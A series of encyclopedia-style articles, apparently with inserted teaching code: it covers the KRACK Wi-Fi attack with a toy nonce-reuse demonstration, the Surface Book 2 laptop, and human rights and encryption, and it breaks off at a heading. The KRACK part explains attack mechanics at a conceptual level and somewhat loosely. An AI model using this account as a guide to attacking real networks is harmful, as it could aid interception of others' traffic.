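        return hashlib.sha256(self.key + data).digest()

session = RekeyingSession(b"initial key", max_bytes=1024)
first_key = session.key
session.send(b"x" * 1000)        # under the volume limit: same key
assert session.key == first_key
session.send(b"x" * 100)         # limit exceeded: key is replaced
assert session.key != first_key
```

The key point is that no single key ever protects more than a bounded amount of traffic, so a compromised or cryptanalyzed key exposes only one window of the conversation.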
https://en.wikipedia.org/wiki/KRACK
KRACK
KRACK ("Key Reinstallation Attack") is a replay attack (a type of exploitable flaw) on the Wi-Fi Protected Access protocol that secures Wi-Fi connections. It was discovered in 2016 by the Belgian researchers Mathy Vanhoef and Frank Piessens of the University of Leuven. Vanhoef's research group published details of the attack in October 2017. By repeatedly resetting the nonce transmitted in the third step of the WPA2 handshake, an attacker can gradually match previously seen encrypted packets and learn the full keychain used to encrypt the traffic. The weakness lies in the Wi-Fi standard itself, not in errors made by individual products or implementations. Therefore, any correct implementation of WPA2 is likely to be vulnerable. The vulnerability affects all major software platforms, including Microsoft Windows, macOS, iOS, Android, Linux, OpenBSD and others. The widely used open-source implementation wpa_supplicant, utilized by Linux and Android, was especially susceptible, as it can be manipulated into installing an all-zeros encryption key, effectively nullifying WPA2 protection in a man-in-the-middle attack. Version 2.7 fixed this vulnerability. The security protocol protecting many Wi-Fi devices can essentially be bypassed, potentially allowing an attacker to intercept sent and received data. Details The attack targets the four-way handshake used to establish a nonce (a kind of "shared secret") in the WPA2 protocol. The standard for WPA2 anticipates occasional Wi-Fi disconnections, and allows reconnection using the same value for the third handshake (for quick reconnection and continuity). Because the standard does not require a different key to be used in this type of reconnection, which could be needed at any time, a replay attack is possible. An attacker can repeatedly re-send the third handshake of another device's communication to manipulate or reset the WPA2 encryption key. 
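The core danger of such a nonce reset is keystream reuse. The toy stream cipher below (not WPA2's actual cipher; the key, nonce, and messages are purely illustrative) shows how an eavesdropper who captures two ciphertexts encrypted under the same key and nonce can cancel the keystream entirely:

```python
import hashlib

def keystream(key: bytes, nonce: bytes, length: int) -> bytes:
    # Toy keystream generator: hash(key || nonce || counter), repeated.
    out = b""
    counter = 0
    while len(out) < length:
        out += hashlib.sha256(key + nonce + counter.to_bytes(4, "big")).digest()
        counter += 1
    return out[:length]

def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

key = b"secret-session-key"
nonce = b"\x00" * 8              # the nonce has been reset to a prior value
p1 = b"attack at dawn__"
p2 = b"defend at dusk__"
c1 = xor(p1, keystream(key, nonce, len(p1)))
c2 = xor(p2, keystream(key, nonce, len(p2)))

# With a reused nonce, XOR of the ciphertexts equals XOR of the plaintexts,
# so any known or guessable plaintext immediately reveals the other message.
assert xor(c1, c2) == xor(p1, p2)
```

Real attacks against WPA2 exploit this same reuse in the actual ciphers (and, in some modes, also enable packet forgery), rather than this simplified construction.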
Each reset causes data to be encrypted using the same values, so blocks with the same content can be seen and matched, working backwards to identify parts of the keychain which were used to encrypt that block of data. Repeated resets gradually expose more of the keychain until eventually the whole key is known, and the attacker can read the target's entire traffic on that connection. According to US-CERT: "US-CERT has become aware of several key management vulnerabilities in the 4-way handshake of the Wi-Fi Protected Access II (WPA2) security protocol. The impact of exploiting these vulnerabilities includes decryption, packet replay, TCP connection hijacking, HTTP content injection, and others. Note that as protocol-level issues, most or all correct implementations of the standard will be affected. The CERT/CC and the reporting researcher KU Leuven, will be publicly disclosing these vulnerabilities on 16 October 2017." The paper describing the vulnerability is available online, and was formally presented at the ACM Conference on Computer and Communications Security on 1 November 2017. US-CERT is tracking this vulnerability, listed as VU#228519, across multiple platforms, and multiple CVE identifiers have been assigned to the KRACK vulnerability. Some WPA2 users may counter the attack by updating Wi-Fi client and access point device software, if they have devices for which vendor patches are available. However, vendors may delay in offering a patch, or not provide patches at all in the case of many older devices. Patches Vendors have released patches against KRACK for many devices, starting at specific firmware and software versions. Workarounds In order to mitigate risk on vulnerable clients, some WPA2-enabled Wi-Fi access points have configuration options that can disable EAPOL-Key frame re-transmission during key installation. Attackers then cannot trigger key reinstallation by delaying frame transmissions, which denies them access to the network, provided TDLS is not enabled. 
One disadvantage of this method is that, with poor connectivity, key reinstallation failure may cause failure of the Wi-Fi link. Continued vulnerability In October 2018, reports emerged that the KRACK vulnerability was still exploitable in spite of vendor patches, through a variety of workarounds for the techniques used by vendors to close off the original attack. See also KrØØk IEEE 802.11r-2008 – Problem in 802.11r fast BSS transition (FT) Wireless security WPA3 References External links krackattacks.com Community-maintained vendor response matrix for KRACK Computer-related introductions in 2017 Computer security exploits Telecommunications-related introductions in 2017 Wi-Fi
https://en.wikipedia.org/wiki/Surface%20Book%202
Surface Book 2
The Surface Book 2 is the second generation of the Surface Book, part of the Microsoft Surface line of personal computers. It is a 2-in-1 PC which can be used like a conventional laptop, or the screen can be detached and used separately as a tablet, with touch and stylus input. In addition to the 13.5-inch screen size of the original Surface Book, introduced two years before, it is also available in a 15-inch model. It was released in November 2017, and replaced in Microsoft's product line by the Surface Book 3 in May 2020. Features Hardware The Surface Book 2 features a full-body magnesium alloy construction. The device comes in two distinct portions: a tablet that contains the CPU, storage, wireless connectivity and touchscreen, and a hardware keyboard base that contains a high-performance mobile GPU, supported by its own active cooling system. The device contains two USB 3.0 Gen-1 ports, a USB-C port, a 3.5 mm headphone jack, a full-sized SD card slot, and two Surface Connect ports (one of which is always occupied by the keyboard base for communication between the two hardware portions, unless the tablet is detached from the base). The front-facing camera contains an infrared sensor that supports login using Windows Hello. From a hardware perspective, this marked the first time Microsoft provided USB-C natively in any Surface device, also supporting USB-C Power Delivery. It was the only Surface computer equipped with USB-C until Microsoft's introduction of the Surface Go in August 2018. Software Surface Book 2 models ship with a pre-installed 64-bit version of Windows 10 Pro and a 30-day trial of Microsoft Office 365. Windows 10 comes pre-installed with Mail, Calendar, People, Xbox (app), Photos, Movies and TV, Groove, and Microsoft Edge. In Windows 10, tablet mode becomes available when the tablet is detached from the base. In this mode, all windows are opened full-screen and the interface becomes more touch-centric. 
Accessories The Surface Book 2 is backward-compatible with all accessories of its direct predecessors, such as the Surface Dock, Surface Dial and Surface Pen. The device's native pen computing capabilities are based on N-trig technology Microsoft acquired in 2015, but major improvements were made to reduce input latency, add tilt support, and capture up to 4,096 levels of pressure sensitivity. Following the device's general public launch, Microsoft also published a series of software updates that further improved the device's palm rejection and pen computing accuracy. Reception The Surface Book 2 received broadly positive reviews, often compared favorably to Apple's MacBook Pro lineup. Most reviews applauded the Surface Book 2's keyboard for offering a class-leading 1.55 mm of key travel, significant performance improvement, well-controlled thermals, and a new hinge, redesigned and built as a single component, that increased device rigidity, improved overall docking reliability, and reduced screen wobble. Other improvements include an improved IR camera that activates faster and supports enhanced anti-spoofing Windows Hello facial recognition, a faster solid-state drive with full drive encryption from first boot, a built-in TPM chip, and two new cooling systems (for the CPU and GPU) that produce less high-pitched noise. The finger scoop has also been reshaped to avoid breaking the glass screen when the lid is being closed, a problem its predecessor suffered from. Devindra Hardawar of Engadget said of the 15-inch model, "The Surface Book 2 is exactly what we've wanted from a high-end Microsoft laptop. It's powerful, sturdy and its unique hinge doesn't come with any compromises." Hardawar also directly compared the Surface Book 2 to Apple's MacBook Pro, saying, "It's the closest a PC maker has come to taking on the MacBook Pro, both in style and substance." 
Tom Warren, of The Verge, also gave the Surface Book 2 positive notice, praising its performance, keyboard, and touchpad. He did, however, express reservations about the hardware design being largely unchanged, noting "I'd still like to see Microsoft refine the design more to address the hinge and screen wobble fully, and pack in a better power supply. It's surprising to see the same design after two years, and I was expecting bigger refinements and changes." Issues The Surface Book 2 faced a number of early production issues when it was first launched in November 2017, including defective operating system images, split key caps, misaligned hinges, overuse of adhesives surrounding the tablet screen, and coil whine when under load. Most issues were gradually resolved as production continued. One issue that remains unfixed, however, is battery drain during high-intensity workloads. When the 15-inch Surface Book 2 is set to "Best Performance" in the Windows 10 power settings, specific scenarios like extensive gaming or video transcoding can lead to high usage across both the CPU and GPU, causing the device to draw over 105 W of power. Because this exceeds what the power supply delivers, the battery unavoidably drains until depletion. This issue first appeared in review units shipped to reviewers and other outlets, all of which were accompanied by official 95-watt power supplies. References External links Microsoft Surface Tablet computers introduced in 2017 2-in-1 PCs
https://en.wikipedia.org/wiki/Human%20rights%20and%20encryption
Human rights and encryption
Human rights applied to encryption is an important concept for freedom of expression, as encryption is a technical resource for implementing basic human rights. With the evolution of the digital age, the application of freedom of speech has become more controversial as new means of communication and new restrictions arise, including government control and commercial practices that put personal information at risk. From a human rights perspective, there is a growing awareness that encryption is an important piece of the puzzle for realizing a free, open and trustworthy Internet. Human rights are moral principles or norms that describe certain standards of human behavior, and are regularly protected as legal rights in municipal and international law. They are commonly understood as inalienable fundamental rights "to which a person is inherently entitled simply because she or he is a human being", and which are "inherent in all human beings" regardless of their nation, location, language, religion, ethnic origin or any other status. They are applicable everywhere and at every time in the sense of being universal, and they are egalitarian in the sense of being the same for everyone. Cryptography is a long-standing subject in the fields of mathematics, computer science and engineering. It can generally be defined as "the protection of information and computation using mathematical techniques." The OECD Guidelines define encryption and cryptography as follows: "Encryption" means the transformation of data by the use of cryptography to produce unintelligible data (encrypted data) to ensure its confidentiality. "Cryptography" means the discipline which embodies principles, means, and methods for the transformation of data in order to hide its information content, establish its authenticity, prevent its undetected modification, prevent its repudiation, and/or prevent its unauthorized use. 
Encryption and cryptography are often used synonymously, although "cryptographic" has a broader technical meaning. For example, a digital signature is "cryptographic" but arguably not technically "encryption". The human rights aspects related to the availability and use of a technology of particular significance for the field of information and communication are recognised in many places. Freedom of expression is recognized as a human right under Article 19 of the Universal Declaration of Human Rights and in international human rights law in the International Covenant on Civil and Political Rights (ICCPR). Article 19 of the UDHR states that "everyone shall have the right to hold opinions without interference" and "everyone shall have the right to freedom of expression; this right shall include freedom to seek, receive and impart information and ideas of all kinds, regardless of frontiers, either orally, in writing or in print, in the form of art, or through any other media of his choice". Overview Since the 1970s, the availability of digital computing and the invention of public key cryptography have made encryption more widely available. Previously, strong versions of encryption were the domain of nation-state actors. However, since the year 2000, cryptographic techniques have been widely deployed by a variety of actors to ensure personal, commercial and public-sector protection of information and communication. Cryptographic techniques are also used to protect the anonymity of communicating actors and to protect privacy more generally. The availability and use of encryption continue to lead to complex, important and highly contentious legal policy debates. There are government statements and proposals on the need to curtail such usage and deployment in view of the potential hurdles it could present for access by government agencies. 
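The distinction noted above between encryption (confidentiality) and other cryptographic goals such as authenticity can be illustrated with Python's standard library. This is a toy sketch: the hash-derived pad stands in for a real cipher, and an HMAC stands in for a signature-like authenticity check.

```python
import hashlib
import hmac
import secrets

def xor_bytes(data: bytes, pad: bytes) -> bytes:
    return bytes(d ^ p for d, p in zip(data, pad))

message = b"meet at noon"
key = secrets.token_bytes(32)

# Encryption (confidentiality): the plaintext becomes unintelligible data.
pad = hashlib.sha256(key).digest()[: len(message)]   # toy pad, not a real cipher
ciphertext = xor_bytes(message, pad)
assert ciphertext != message
assert xor_bytes(ciphertext, pad) == message         # decryption recovers it

# Authenticity/integrity without encryption: a keyed tag over the *plaintext*.
# The message stays readable; the tag only proves origin and detects tampering.
tag = hmac.new(key, message, hashlib.sha256).digest()
assert hmac.compare_digest(tag, hmac.new(key, message, hashlib.sha256).digest())
```

Both operations are "cryptographic" in the OECD sense, but only the first is "encryption": the HMAC leaves the message's information content fully visible.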
The rise of commercial services offering end-to-end encryption, and the calls for restrictions and solutions in view of law enforcement access, continue to fuel debate around the use of encryption and the legal status of the deployment of cryptography more generally. Encryption, as defined above, refers to a subset of cryptographic techniques for the protection of information and computation. The normative value of encryption, however, is not fixed but varies with the type of cryptographic method that is used or deployed and for which purposes. Traditionally, encryption (cipher) techniques were used to ensure the confidentiality of communications and prevent access to information and communications by others than the intended recipients. Cryptography can also ensure the authenticity of communicating parties and the integrity of communications contents, providing a key ingredient for enabling trust in the digital environment. Within the human rights community there is a growing awareness that encryption plays an important role in realizing a free, open and trustworthy Internet. UN Special Rapporteur on the promotion and protection of the right to freedom of opinion and expression David Kaye observed, during the Human Rights Council in June 2015, that encryption and anonymity deserve a protected status under the rights to privacy and freedom of expression: "Encryption and anonymity, today's leading vehicles for online security, provide individuals with a means to protect their privacy, empowering them to browse, read, develop and share opinions and information without interference and enabling journalists, civil society organizations, members of ethnic or religious groups, those persecuted because of their sexual orientation or gender identity, activists, scholars, artists and others to exercise the rights to freedom of opinion and expression." 
Encryption in media and communication Two types of encryption in media and communication can be distinguished: encryption may be deployed by a service provider's choice, or by Internet users themselves. Client-side encryption tools and technologies are relevant for marginalized communities, journalists and other online media actors practicing journalism, as they become a way of protecting their rights. Encryption provided by service providers can prevent unauthorized third-party access, but the service provider implementing it would still have access to the relevant user data. End-to-end encryption refers to encryption that also prevents the service providers themselves from having access to the user's communications. The implementation of these forms of encryption has sparked the most debate since the year 2000. Service provider deployed techniques to prevent unauthorized third-party access Amongst the most widely deployed cryptographic techniques is securing the communications channel between internet users and specific service providers against man-in-the-middle attacks and access by unauthorized third parties. These cryptographic techniques must be run jointly by a user and the service provider to work. This means that they require service providers, such as an online news publisher or a social network, to actively integrate them into service design and implementation. Users cannot deploy these techniques unilaterally; their deployment is contingent on active participation by the service provider. The TLS protocol, which becomes visible to the ordinary internet user through the HTTPS prefix, is widely used for securing online commerce, e-government services and health applications, as well as devices that make up networked infrastructures, e.g., routers and cameras. However, although the standard has existed since the 1990s, the wider spread and evolution of the technology has been slow. 
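On the client side, the TLS protections described above amount to a few lines of configuration. For example, with Python's standard ssl module (a sketch only; no network connection is made here):

```python
import ssl

# create_default_context() enables certificate validation and hostname
# checking, the guarantees a browser relies on for an HTTPS connection.
ctx = ssl.create_default_context()
ctx.minimum_version = ssl.TLSVersion.TLSv1_2   # refuse legacy SSL/TLS versions

assert ctx.verify_mode == ssl.CERT_REQUIRED    # the server must present a valid cert
assert ctx.check_hostname                      # the cert must match the hostname

# ctx.wrap_socket(sock, server_hostname="example.org") would then perform
# the TLS handshake over an ordinary TCP socket.
```

The deployment burden discussed in the text lies on the server side: the operator must obtain certificates and configure the service, which a client cannot do unilaterally.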
As with other cryptographic methods and protocols, the practical challenges related to proper, secure and (wider) deployment are significant and have to be considered. Many service providers still do not implement TLS, or do not implement it well. In the context of wireless communications, the use of cryptographic techniques that protect communications from third parties is also important. Different standards have been developed to protect wireless communications: 2G, 3G and 4G standards for communication between mobile phones, base stations and base station controllers; standards to protect communications between mobile devices and wireless routers ('WLAN'); and standards for local computer networks. One common weakness in these designs is that the transmission points of the wireless communication can access all communications, e.g., the telecommunications provider. This vulnerability is exacerbated when wireless protocols only authenticate user devices, but not the wireless access point. There is also the distinct question of protecting data 'at rest', whether the data is stored on a device or on a remote server, as in the cloud. Given the vulnerability of cellphones to theft, for instance, particular attention may be given to limiting service providers' access. This does not exclude the situation that the service provider discloses this information to third parties like other commercial entities or governments. The user needs to trust the service provider to act in their interest. The possibility that a service provider is legally compelled to hand over user information, or to interfere with particular communications with particular users, remains. Privacy Enhancing Technologies There are services that specifically market themselves with claims not to have access to the content of their users' communication. 
Service providers can also take measures that restrict their own ability to access information and communication, further increasing the protection of users. The integrity of these Privacy Enhancing Technologies (PETs) depends on delicate design decisions as well as the willingness of the service provider to be transparent and accountable. For many of these services, the service provider may offer some additional features (besides the ability to communicate), for example contact list management—meaning that it can observe who is communicating with whom—but take technical measures so that it cannot read the contents of the messages. This has potentially negative implications for users; for instance, since the service provider has to take action to connect users who want to communicate using the service, it also has the power to prevent users from communicating in the first place. Following the discovery of vulnerabilities, there is a growing awareness that more investment is needed in auditing widely used code coming out of the free and open-source software community. The pervasiveness of business models that depend on the collection and processing of user data can be an obstacle to adopting cryptographic mechanisms for protecting information at rest. As Bruce Schneier has stated: "[s]urveillance is the business model of the Internet. This has evolved into a shockingly extensive, robust, and profitable surveillance architecture. You are being tracked pretty much everywhere you go on the Internet, by many companies and data brokers: ten different companies on one site, a dozen on another." Cryptographic methods play a key role in online identity management. Digital credential systems can be used to allow anonymous yet authenticated and accountable transactions between users and service providers, and can be used to build privacy-preserving identity management systems. 
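A service that "cannot read the contents of the messages", as described above, can be sketched minimally in Python. All names here are hypothetical, and the XOR keystream is a stand-in for a real cipher; how sender and recipient agree on the shared key (e.g. via a key exchange) is out of scope for this sketch.

```python
import hashlib
import secrets

def xor_keystream(data: bytes, key: bytes, nonce: bytes) -> bytes:
    # Toy keystream cipher for illustration only; real systems use vetted ciphers.
    stream = b""
    counter = 0
    while len(stream) < len(data):
        stream += hashlib.sha256(key + nonce + counter.to_bytes(4, "big")).digest()
        counter += 1
    return bytes(d ^ s for d, s in zip(data, stream))

class Provider:
    """Relays and stores only ciphertext; it never holds a decryption key."""
    def __init__(self):
        self.stored = []
    def upload(self, blob: bytes) -> int:
        self.stored.append(blob)   # the provider sees metadata (size, timing)
        return len(self.stored) - 1

shared_key = secrets.token_bytes(32)   # known to sender and recipient only
nonce = secrets.token_bytes(8)
message = b"the provider cannot read this"

provider = Provider()
blob_id = provider.upload(xor_keystream(message, shared_key, nonce))

assert provider.stored[blob_id] != message   # opaque to the provider
assert xor_keystream(provider.stored[blob_id], shared_key, nonce) == message
```

Note what the sketch does not hide: the provider still observes who uploads, when, and how much, which is exactly the metadata problem discussed later in this article.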
End-user and community-driven encryption and collaborative services The Internet allows end-users to develop applications and uses of the network without having to coordinate with the relevant internet service providers. Many of the available encryption tools are not developed or offered by traditional service providers or organizations but by experts in the free and open-source software (FOSS) and Internet engineering communities. A major focus of these initiatives is to produce Privacy Enhancing Technologies (PETs) that can be unilaterally or collaboratively deployed by interested users who are ready, willing, and able to look after their own privacy interests when interacting with service providers. These PETs include standalone encryption applications as well as browser add-ons that help maintain the confidentiality of web-based communications or permit anonymous access to online services. Technologies such as keystroke loggers can intercept content as it is entered, before encryption is applied, and thereby deprive these tools of their protective effect. Hacking into information systems and devices to access data at or after the moment of decryption can have the same effect. Multi-party computation (MPC) techniques are an example of collaborative solutions that allow parties, e.g., NGOs with sensitive data, to do data analytics without revealing their datasets to each other. All of these designs leverage encryption to provide privacy and security assurances in the absence of a trustworthy centralized authority. There are many developments in the implementation of cryptocurrencies using blockchain protocols. These systems can have many benefits, and the protocols can also be useful for novel forms of contracts and electronic attestation, useful aids when legal infrastructure is not readily available. As to the protection of privacy related to payments, it is a common misconception that the cryptographic techniques used in Bitcoin ensure anonymous payments. 
The only protection offered by Bitcoin is pseudonymity.

The cryptographic protection of metadata

The availability of metadata (the information relating to a user's information and communications behavior) can pose a particular threat to users, including the information that service providers can observe through the provisioning of services: when, how frequently, for how long, and with whom users are communicating. Metadata can also be used to track people geographically and can interfere with their ability to communicate anonymously. As noted in the Berkman Center report, metadata is generally not encrypted in ways that make it inaccessible to governments, and accordingly "provides an enormous amount of surveillance data that was unavailable before [internet communication technologies] became widespread." To minimize the exposure of meaningful metadata, encryption tools may need to be used in combination with technologies that provide communication anonymity.

The Onion Router

The Onion Router, most commonly known as Tor, offers the ability to access websites and online services anonymously. Tor relies on a community of volunteers who run intermediary proxies that channel a user's communication with a website so that third parties cannot observe who the user is communicating with. Through the use of encryption, each proxy is aware of only part of the communication path, meaning that no proxy can by itself infer both the user and the website she is visiting. Besides protecting anonymity, Tor is also useful when the user's ISP blocks access to content, a protection similar to that offered by a VPN. Service providers, such as websites, can block connections that come from the Tor network. Because certain malicious traffic may reach service providers as Tor traffic, and because Tor traffic may also interfere with their business models, service providers may have an incentive to do so.
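The layered encryption underlying this design can be sketched with a toy cipher (XOR against a hash-derived keystream stands in for real onion cryptography; the relay names and keys are purely illustrative):

```python
import hashlib

def keystream(key: bytes, n: int) -> bytes:
    # Toy keystream from iterated SHA-256 -- illustrative only,
    # not a cryptographically sound stream cipher.
    out = b""
    counter = 0
    while len(out) < n:
        out += hashlib.sha256(key + counter.to_bytes(4, "big")).digest()
        counter += 1
    return out[:n]

def xor_layer(data: bytes, key: bytes) -> bytes:
    # XOR is involutive: applying the same layer twice removes it.
    return bytes(a ^ b for a, b in zip(data, keystream(key, len(data))))

relay_keys = [b"entry-key", b"middle-key", b"exit-key"]  # hypothetical relays
message = b"GET /page"

# The client wraps the message in one layer per relay, innermost last.
packet = message
for key in reversed(relay_keys):
    packet = xor_layer(packet, key)

# Each relay peels exactly one layer; the plaintext appears only after the
# last relay, and no single relay sees both sender and destination.
for key in relay_keys:
    packet = xor_layer(packet, key)
assert packet == message
```

In real onion routing each relay additionally learns only the address of the next hop, which is what prevents any single relay from linking user and website.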
Such blocking can prevent users from using the most effective means to protect their anonymity online. The Tor browser allows users to obfuscate the origin and end-points of their communications on the Internet.

Obfuscation

Obfuscation is the automated generation of "fake" signals that are indistinguishable from users' actual online activities, providing users with a noisy "cover" under which their real information and communication behavior remains unobservable. Obfuscation has recently received more attention as a method to protect users online. TrackMeNot is an obfuscation tool for search engine users: the plugin sends fake search queries to the search engine, impairing the search engine provider's ability to build an accurate profile of the user. Although TrackMeNot and other search-obfuscation tools have been found to be vulnerable to certain attacks that allow search engines to distinguish between user-generated and computer-generated queries, further advances in obfuscation are likely to play a positive role in protecting users when disclosure of information is inevitable, as in the case of search or location-based services.

Cryptography, law and human rights

Restrictions on cryptographic techniques

Recent incidents of terrorism have led to further calls for restrictions on encryption. Although, in the interest of public safety, there are many proposals to interfere with the free deployment of strong encryption, these proposals do not hold up to close scientific scrutiny. They also side-step a more fundamental point: what is at stake for users. Considering the existing threat landscape for users of digital communications and computing, more advanced security measures seem necessary.
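The query obfuscation described above can be sketched as follows (the decoy list is hypothetical; TrackMeNot itself draws phrases from sources such as RSS feeds rather than a fixed list):

```python
import random

DECOYS = ["weather tomorrow", "capital of france", "pasta recipe",
          "train timetable", "movie reviews"]  # hypothetical decoy phrases

def obfuscated_stream(real_queries, decoys_per_query=3, rng=None):
    """Interleave each real query with machine-generated decoys so an
    observer of the stream cannot tell which queries are the user's."""
    rng = rng or random.Random()
    stream = []
    for query in real_queries:
        batch = [query] + rng.sample(DECOYS, decoys_per_query)
        rng.shuffle(batch)  # the real query hides among the decoys
        stream.extend(batch)
    return stream

stream = obfuscated_stream(["symptoms of flu"], rng=random.Random(7))
print(len(stream))  # 4 queries leave the machine, only 1 of them real
```

The search provider still sees every query, but its profile of the user is diluted by traffic that does not reflect the user's actual interests.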
While many governments consider that encryption techniques could present a hurdle in the investigation of crime and the protection of national security, certain countries, such as Germany or the Netherlands, have taken a strong position against restrictions on encryption on the Internet. In 2016, the Ministers of the Interior of France and Germany jointly stated the need to work on solutions to the challenges law enforcement may face as a result of end-to-end encryption, in particular when it is offered from a foreign jurisdiction. In a joint statement, the European Union Agency for Network and Information Security (ENISA) and Europol have also taken a stance against the introduction of backdoors in encryption products. In addition, restrictions would have serious detrimental effects on cyber security, trade and e-commerce.

Encryption and the law: the broader landscape

Privacy and data protection legislation is closely related to the protection of human rights. There are now more than 100 countries with data protection laws. One of the key principles for the fair and lawful processing of personal information regulated by data protection laws is the principle of security: proper security measures must be taken to ensure the protection of personal data against unlawful access by others than the intended recipients. The European Union's General Data Protection Regulation, adopted in 2016 and entering into force in 2018, contains an advanced set of rules on the security of personal data. Encryption can serve as a safeguard against personal data breaches, as it can facilitate the implementation of privacy and data protection by design. Cryptography has also been an essential ingredient in establishing the conditions for e-commerce over the Internet.
The OECD principles were adopted to ensure that national cryptography policy would not interfere with trade and to secure the conditions for international developments in e-commerce.

International cryptography policy and human rights

The policy debate about encryption has a significant international dimension because of the international nature of communications networks and the Internet, as well as trade, globalization and national security dimensions. The OECD adopted its Recommendation Concerning Guidelines for Cryptography Policy on March 27, 1997. This policy intervention of the OECD, primarily aimed at its member countries, has three components: a Recommendation of the OECD Council; Guidelines for Cryptography Policy (as an annex to the Recommendation); and a Report on Background and Issues of Cryptography Policy explaining the context for the Guidelines and the basic issues involved in the cryptography law and policy debate. The principle most explicit about the connection to human rights is Principle 5 on the protection of privacy and personal data: "The fundamental rights of individuals to privacy, including secrecy of communications and protection of personal data, should be respected in national cryptography policies and in the implementation and use of cryptographic methods."

UNESCO, after consulting stakeholders, has identified encryption as a relevant element for policy on privacy and freedom of expression. Its Keystones report (2015) articulates that "to the extent that our data can be considered representative of ourselves, encryption has a role to play in protecting who we are, and in preventing abuse of user content. It also allows for greater protection of privacy and anonymity in transit by ensuring that the contents (and sometimes also the metadata) of communications are only seen by the intended recipient."
The report recognizes "the role that anonymity and encryption can play as enablers of privacy protection and freedom of expression", and proposes that UNESCO facilitate dialogue on these issues.

The Necessary and Proportionate Principles, developed and adopted by civil society actors, stipulate the protection of the integrity of communications systems as one of their 13 principles. The principles themselves do not provide explicit guidance on specific cryptographic policy issues such as backdoors or restrictions on the deployment of encryption. The guidance offered by the OECD principles and the recent positions of the UN Special Rapporteur on encryption underline the importance of encryption for the protection of human rights. While this guidance does not give a definitive answer to the question of whether a mandate for encryption backdoors is to be considered incompatible with international law, it points in that direction. Generally, the available guidance at the international level clarifies that when limitations are imposed on encryption, the relevant human rights guarantees have to be strictly observed.

National level developments in selected countries

United States

There has been a broad, active and contentious policy debate on encryption in the United States since the 1990s, beginning with the "Crypto Wars". This involved the adoption of the Communications Assistance for Law Enforcement Act (CALEA), containing requirements for telecommunications providers and equipment manufacturers to ensure the possibility of effective wiretapping. It also involved a debate over existing export controls on strong encryption products (considering their classification as munitions) and a criminal investigation into the cryptographic e-mail software developer and activist Phil Zimmermann. The case was dropped, and the general debate resolved, after the liberalization of export controls on most commercial products with strong encryption features and the transfer of these items from the United States
Munitions List (USML), administered by the Department of State, to the Commerce Control List (CCL), administered by the Department of Commerce. The U.S. Department of Commerce maintains some controls over items on the CCL, including registration, technical reviews and reporting obligations, and continues to impose licensing and other requirements for sensitive encryption items and sales of such items to foreign governments.

The debate reignited after the Edward Snowden revelations and the well-documented increase in deployed encryption measures by Internet services, device makers and users, as well as a concerted call from the technical community and civil society to increase the use and security of encryption to address mass surveillance practices. The increased adoption of encryption by industry has been received critically by certain government actors, the FBI in particular. This led to the widely reported FBI–Apple encryption dispute over the possibility of gaining access to information on an iPhone in assistance to law enforcement. In 2016, several bills were introduced in the US Congress that would place new limits on encryption under US law.

The US legal system promotes and requires security measures to be implemented in the relevant contexts, including cryptographic methods of various kinds, to ensure security in commerce and trade. Relevant laws are the Federal Information Security Modernization Act (FISMA) of 2014, the Gramm-Leach-Bliley Act, the Health Insurance Portability and Accountability Act (HIPAA) and the Federal Trade Commission Act. These acts contain security requirements and thereby indirectly require or stimulate the use of encryption in certain circumstances. Finally, many state breach notification laws treat encrypted data as a safe harbor by exempting firms whose data was encrypted from notice obligations.
Constitutional considerations and human rights play a significant role in the US debate about the legal treatment of encryption methods. Restrictions on the distribution of cryptographic protocols and the publication of cryptographic methods are considered an interference with the First Amendment, the US constitutional safeguard protecting freedom of expression. The US has particularly active and strongly developed civil society actors involved in cryptographic policy and practice. The United States is a primary site for cryptologic research and engineering and for the development and implementation of cryptographic service innovations, and there is an active community of non-governmental organizations engaged in the national and international debate on encryption policy.

The predominant interferences with strong encryption that take place or are being considered arise in the fields of national security, law enforcement and foreign affairs. In this area, and in answering the contentious question of whether and how lawful access to specific communications could be ensured, the US government has internationally explained its policy as one aiming to ensure that "responsibly deployed encryption" helps to "secure many aspects of our daily lives, including our private communications and commerce", but also "to ensure that malicious actors can be held to account without weakening our commitment to strong encryption".

Germany

As part of the global debate on encryption in the late 1990s, a debate also took place in Germany about the need for, and legitimacy of, a general ban on the encryption of communications because of its impact on criminal investigations. There were profound doubts about the constitutional legitimacy of such a ban, as well as concerns about its negative factual consequences.
In qualitative terms, a number of fundamental rights are considered to be affected by restrictions on encryption: the secrecy of telecommunications, expressions of the general right of personality and, indirectly, all communicative freedoms exercisable over the Internet. In 1999, the Federal Government set out key points for German cryptographic policy, which was above all meant to foster confidence in the security of encryption rather than restrict it. Beyond statements by the German Minister of the Interior about possible future restrictions, Germany aligns with the position of the UN Special Rapporteur David Kaye: it adopts a policy of non-restriction or comprehensive protection, imposing restrictions only on a case-specific basis. In November 2015, representatives of the government and of the private sector together signed a "Charter to Strengthen Trusted Communication" (Charta zur Stärkung der vertrauenswürdigen Kommunikation), in which they stated: "We want to be Encryption Site No. 1 in the world."

The German government has also used its foreign policy to promote international privacy standards. In particular, Germany, in a joint effort with Brazil, worked in the Human Rights Council for the appointment of a UN Special Rapporteur on Privacy. There are multiple examples of government efforts to implement encryption policy, ranging from informal actions to laws and regulations: the IT Security Act of 2015 and the "De-Mail" law. There are also several sector-specific rules on encryption and information security in Germany, such as the Telecommunications Act (TKG). The German Constitutional Court has also provided valuable input for the international legal handling of encryption techniques with its "IT basic right", by which the court recognizes that parts of one's personality extend into IT systems, so that the applicable protection has to travel with them.
India

Indian law and policy promote and require the implementation of strong encryption as a security measure, for instance in banking, e-commerce and by organizations handling sensitive personal information. At the same time, there are a number of limitations on the free deployment of encryption by electronic communications services, and notable legal uncertainty about the precise scope of the relevant license requirements and the extent to which they could have legal effect on the use or deployment of services by end-users of the covered services.

The encryption debate ignited publicly in India in 2008, after the government published a draft proposal containing a number of envisioned limitations on the use of encryption. The policy, issued under Section 84A of the Indian Information Technology (Amendment) Act, 2008, was short-lived, but worries remain about the lack of safeguards for privacy and freedom of expression that the draft illustrated. In response to the outcry, the Indian government first exempted "mass use encryption products, which are currently being used in web applications, social media sites, and social media applications such as Whatsapp, Facebook, Twitter etc." Soon thereafter, it withdrew the proposed policy, and a new policy has not yet been made public.

Section 84A of the Indian Information Technology (Amendment) Act, 2008 empowers the government to formulate rules on modes of encryption for the electronic medium. Legal commentators have noted the lack of transparency about which types of encryption use and deployment are permitted and required under Indian law, especially in the field of electronic communications services. The central Indian government thus holds, in theory, a broad exclusive monopoly over electronic communications, which includes the privilege of providing telecommunications and Internet services in India.
Brazil

